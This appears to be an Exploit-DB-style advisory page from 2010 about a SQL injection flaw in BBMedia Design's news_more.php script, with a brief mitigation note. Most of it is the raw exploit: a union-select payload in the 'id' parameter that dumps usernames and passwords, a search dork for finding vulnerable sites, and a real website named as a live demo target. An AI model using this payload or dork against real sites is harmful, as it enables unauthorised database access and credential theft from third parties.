BBMedia Design's (news_more.php) SQL Injection Vulnerability

vendor:

news_more.php

by:

gendenk

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: news_more.php

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

BBMedia Design’s (news_more.php) SQL Injection Vulnerability

The vulnerability exists in the 'news_more.php' script, which allows an attacker to inject malicious SQL queries via the 'id' parameter. An example of a malicious URL is http://[target]/[path]/news_more.php?id=-9999+union+all+select+1,2,concat(id,0x3a,user,0x3a,pass),4,5,6,7,8+from+users/*

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection.

Source

Exploit-DB raw data:

#################################################################################################

[+] BBMedia Design's (news_more.php) SQL Injection Vulnerability

[+] Discovered By gendenk

[+] Published: 2010-05-23 Pukul 19.00 WIB

[+] jatimcrew.org/

##################################################################################################

# Script Homepage:
# http://www.bbmedia.org

[+]Dork: intext:"Design by BB Media.Org"

[+] SQL Injection


     demo : http://www.ms-hydraulic.com/news_more.php?id=15


       http://[target]/[path]/news_more.php?id=[SQL]

       http://[target]/[path]/news_more.php?id=-9999+union+all+select+1,2,concat(id,0x3a,user,0x3a,pass),4,5,6,7,8+from+users/*

##################################################################################################

Life is challanging, the fear of challanges, causing you for backwardness..Facing for the bright future..

#Thanks to : Cyberlog, Cr4wl3r, Byz9991 and MAMA Sri Rahayu [ istri cyberlog ] Semoga Cepet Sembuh..

Buat Yayank Ucrit I Love U Full :P


All Member Jatimcrew, Manadocoding, Sekuritionline.. 
##################################################################################################